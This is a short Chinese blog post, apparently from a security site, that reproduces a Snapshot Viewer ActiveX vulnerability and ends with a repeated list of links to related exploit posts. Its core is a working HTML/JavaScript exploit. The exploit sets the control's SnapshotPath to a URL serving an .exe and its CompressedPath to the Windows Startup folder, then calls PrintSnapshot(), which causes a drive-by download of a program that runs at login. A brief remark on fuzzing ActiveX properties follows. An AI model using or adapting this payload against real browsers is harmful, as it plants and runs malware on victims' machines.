Linux 2.6.9内
今天有人发了个Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞
EXP:
<html><object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object><script language='javascript'>var buf1 = ‘http://127.0.0.1/a.exe';var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe’;obj.SnapshotPath = buf1;obj.CompressedPath = buf2;obj.PrintSnapshot();</script></html>Fuzzing 时一般是对单个Property和单个Method()做FUZZ,这时会检测到对SnapshotPath有HTTP GET。然后想想它总是需要保存到本地的,再测试其他Property。由于此ActiveX的Property和Method都非常少,很快可以 FUZZ完
相关日志
phpwind管理权限泄露漏洞利用程序PHP版
安全服务代维:新安全形势下的新选择
phpwind管理权限泄露漏洞+利用程序
dvbbs8.2(access/sql)version login.asp remote sql injection
FLASH 0DAY 详细分析和总结
VMware Server Console ActiveX DOS POC
PHP Source Auditor 4 released
MercuryBoard <= 1.1.5 (login.php) Remote Blind SQL Injection Exploit
Dedecms getip()的漏洞利用
phpwind管理权限泄露漏洞利用程序PHP版
安全服务代维:新安全形势下的新选择
phpwind管理权限泄露漏洞+利用程序
dvbbs8.2(access/sql)version login.asp remote sql injection
FLASH 0DAY 详细分析和总结
VMware Server Console ActiveX DOS POC
PHP Source Auditor 4 released
MercuryBoard <= 1.1.5 (login.php) Remote Blind SQL Injection Exploit
Dedecms getip()的漏洞利用
